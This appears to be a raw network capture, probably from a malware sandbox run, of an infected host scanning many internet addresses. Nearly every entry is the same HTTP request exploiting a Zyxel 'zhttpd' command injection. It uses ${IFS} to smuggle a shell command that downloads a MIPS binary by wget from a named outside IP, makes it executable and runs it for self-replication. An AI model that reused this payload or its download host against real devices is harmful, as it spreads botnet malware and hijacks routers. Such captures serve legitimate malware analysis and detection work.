                                            Jan 14, 2024 15:50:31.271119118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2127192.168.2.2336624174.159.26.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271126032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2128192.168.2.2359974130.199.34.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271128893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2129192.168.2.2354008212.47.68.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271148920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2130192.168.2.234754857.162.39.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271157026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2131192.168.2.234280637.198.22.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271238089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2132192.168.2.2341256208.239.73.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271245956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2133192.168.2.2337776209.32.167.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271274090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2134192.168.2.2355548169.44.88.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271320105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2135192.168.2.2336478102.141.46.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271341085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2136192.168.2.2348162201.189.187.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271368980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2137192.168.2.2338678102.146.250.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271373034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2138192.168.2.235911089.141.42.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271414995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2139192.168.2.235975067.82.133.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271420002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2140192.168.2.233683894.121.76.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274111032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2141192.168.2.235505036.33.146.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274658918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2142192.168.2.2356068137.65.139.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274677992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2143192.168.2.233984840.136.217.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274698019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2144192.168.2.2334218152.247.226.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274717093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2145192.168.2.2349864107.147.182.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274772882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2146192.168.2.235413494.129.202.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274794102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2147192.168.2.2358898164.226.177.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274820089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2148192.168.2.2338052184.228.9.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274827957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2149192.168.2.234162854.33.196.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274888039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2150192.168.2.235801293.236.88.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274908066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2151192.168.2.235953835.128.235.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274940968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2152192.168.2.2332972207.213.57.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274940968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2153192.168.2.2334826216.117.160.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.274993896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2154192.168.2.235857454.206.168.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.275017977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2155192.168.2.2350996149.69.135.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.275037050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2156192.168.2.2359224122.217.26.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.275067091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2157192.168.2.2338750101.76.108.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.275095940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2158192.168.2.2356358147.181.44.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.275116920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2159192.168.2.2345894167.106.12.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.275139093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2160192.168.2.2340432180.138.160.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.275151968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2161192.168.2.2341430187.243.73.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.289868116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2162192.168.2.2348012149.74.36.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.287727118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2163192.168.2.2347380105.118.73.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.287759066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2164192.168.2.2351278213.38.159.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.287811995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2165192.168.2.2348912193.159.216.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.287915945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2166192.168.2.234057418.70.129.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.287962914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2167192.168.2.234356813.190.148.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.287985086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2168192.168.2.234513019.40.87.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288024902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2169192.168.2.234276694.174.54.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288041115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2170192.168.2.2345954197.157.221.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288052082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2171192.168.2.234678291.83.103.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288077116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2172192.168.2.2356748137.45.148.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288101912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2173192.168.2.2356858148.239.26.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288136959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2174192.168.2.2360006111.117.249.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288155079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2175192.168.2.2338074178.43.246.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288181067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2176192.168.2.234527278.68.248.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288218021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2177192.168.2.2354964196.215.211.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288245916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2178192.168.2.234619066.183.129.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288269997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2179192.168.2.234383876.87.239.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288309097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2180192.168.2.233576294.24.35.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288347006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2181192.168.2.2335122173.13.141.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288376093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2182192.168.2.2334964187.45.63.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288408995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2183192.168.2.2342780205.243.41.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288428068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2184192.168.2.2353394158.202.43.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288496017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2185192.168.2.2342690197.193.137.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288505077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2186192.168.2.234050863.38.38.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288558006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2187192.168.2.2332982186.125.27.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288585901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2188192.168.2.2341326110.30.209.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.288614035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2189192.168.2.23550525.90.123.232443
                                            TimestampBytes transferredDirectionData
